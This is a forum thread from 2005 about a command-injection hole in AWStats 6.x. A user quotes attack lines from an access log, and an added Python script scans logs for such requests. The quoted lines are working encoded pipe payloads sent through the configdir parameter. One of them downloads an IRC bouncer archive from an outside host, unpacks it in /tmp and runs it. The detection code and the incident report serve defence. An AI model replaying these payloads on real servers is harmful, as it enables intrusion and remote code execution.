
RE: Security Vulnerability Awstats v6.xx

Developers
2005-05-17
2012-10-11
  • User has hacked and run code on my machine via this code.

    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:03:39 +1000] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bid%3becho%20e_exp%3b%2500 HTTP/1.1" 500 607
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:03:55 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bid%3becho%20e_exp%3b%2500 HTTP/1.1" 200 540
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:04:02 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bps%20aux%3becho%20e_exp%3b%2500 HTTP/1.1" 200 13548
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:04:43 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bkillall%20%2d9%20FahCore_65%2eex%3becho%20e_exp%3b%2500 HTTP/1.1" 200 523
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:05:11 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bkillall%20%2d9%20fold%3becho%20e_exp%3b%2500 HTTP/1.1" 200 514
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:06:02 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20jajales%2ehome%2ero%2fbsdbnc%2etar%2egz%3btar%20xzvf%20bsdbnc%2etar%2egz%3bcd%20psybnc%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 7092

    • Found this code is able to execute arbitrary code in your /tmp folder with default settings.

    • Updating to 6.4 and awaiting reply. Can someone email me if this is still a problem in the 6.4 released port on FreeBSD 5.2.1?

    • Can confirm the version is 6.0 in the original vulnerability.
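
A detection pass over access-log lines of the kind quoted in the post, added here as an example; it is not part of the original post and not AWStats code. It parses Common Log Format lines, URL-decodes the configdir parameter the way the CGI would see it, and flags values that begin or end with a pipe (the form Perl's two-argument open() treats as a command to run), contain a NUL byte (the %2500 that decodes to %00 above), or carry shell metacharacters. The two attack lines are copied from the log in the post; the two benign lines with 192.0.2.x hosts are constructed for contrast.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Two request lines taken from the access log quoted in the post above, plus
# two constructed benign lines (192.0.2.x hosts, example.org config) for contrast.
SAMPLE_LOG = """\
sls-ce7p10.dca2.superb.net - - [17/May/2005:18:03:39 +1000] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bid%3becho%20e_exp%3b%2500 HTTP/1.1" 500 607
sls-ce7p10.dca2.superb.net - - [17/May/2005:18:04:02 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bps%20aux%3becho%20e_exp%3b%2500 HTTP/1.1" 200 13548
192.0.2.10 - - [17/May/2005:18:07:00 +1000] "GET /awstats/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 8120
192.0.2.11 - - [17/May/2005:18:07:30 +1000] "GET /awstats/awstats.pl?config=example.org&output=main HTTP/1.1" 200 8120
"""

# Common Log Format: host ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Characters that have no business in a directory path but matter to a shell
# or to Perl's two-argument open(): a leading/trailing pipe runs a command,
# ';' and backticks chain commands, and a NUL byte truncates the string.
SHELL_META = (";", "`", "$(", "|", "\n")


def configdir_reason(raw_value):
    """Return a short reason string if the configdir value looks like an
    injection attempt, or None if it looks like a plain directory path."""
    value = raw_value.strip()
    # parse_qs already decoded the value once; decode again so a
    # double-encoded %2500 shows up as a real NUL byte.
    deep = unquote(value)
    if value.startswith("|") or value.endswith("|"):
        return "pipe at start/end of configdir (command execution via open())"
    if "\x00" in deep or "%00" in value:
        return "NUL byte in configdir (path truncation)"
    if any(m in value for m in SHELL_META):
        return "shell metacharacter in configdir"
    if ".." in value:
        return "parent-directory traversal in configdir"
    return None


def scan_log(text):
    """Parse CLF lines and return one finding per awstats.pl request whose
    configdir parameter fails the checks above."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparsable lines rather than abort the scan
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("awstats.pl"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("configdir", []):
            reason = configdir_reason(value)
            if reason:
                findings.append({
                    "host": m.group("host"),
                    "time": m.group("ts"),
                    "path": parts.path,
                    "status": int(m.group("status")),
                    "configdir": value,
                    "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['path']} status={f['status']}: "
              f"{f['reason']} -> {f['configdir']!r}")
```

The status code and path are kept in each finding on purpose: in the log above the same payload got a 500 under /cgi-bin/ but a 200 with a 13 KB body under /awstats/, which is the sign that the command output was actually returned, so a 200 with an unusual body size on a flagged request deserves the first look.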

    • mark
      2005-08-19

      Why don't you set a permission for this .pl?